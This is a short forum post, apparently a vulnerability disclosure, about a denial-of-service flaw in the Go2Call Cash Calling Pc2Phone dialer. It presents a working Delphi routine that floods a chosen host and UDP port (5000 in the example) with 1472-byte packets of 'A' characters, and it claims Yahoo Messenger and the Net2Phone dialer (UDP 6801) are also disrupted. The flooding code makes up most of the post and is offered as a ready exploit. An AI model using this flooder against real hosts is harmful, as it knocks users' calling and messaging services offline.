Hi, sorry fo my english.

I found some bug in programm Go2Call Cash Calling

It's dialer for talking from Internet Pc2Phone

If you send a little UDP packets with size 1500 bytes

for example 1472 chars 'A' on 5000 port then this prog

will doesn't work

The exploit is very easy

a part of code on Delphi

procedure TForm1.Button1Click(Sender: TObject);

var C:string;

N:integer;

MyStream:TMemoryStream;

begin

Memo1.Lines.Add('start');

C:=Edit3.Text; //for example 'AAAA...' 1472 char 'A' for certain

N:=strtoint(Edit4.Text);

NMUDP1.RemoteHost:=Edit1.Text;

NMUDP1.RemotePort:=strtoint(Edit2.Text);

MyStream:=TMemoryStream.Create;

try

MyStream.Write(C[1],Length(C));

for n:=1 to N do

begin

NMUDP1.SendStream(MyStream);

end;

finally

MyStream.Free;

end;

Memo1.Lines.Add('finish');

end;

Yahoo messenger for example lost connection afte so ataks and 5000 UDP

port too

Net2Phone dialer pc2phone (likely Go2Call dialer) will have sound noize in

your headphone, 6801 UDP port

[ reply ]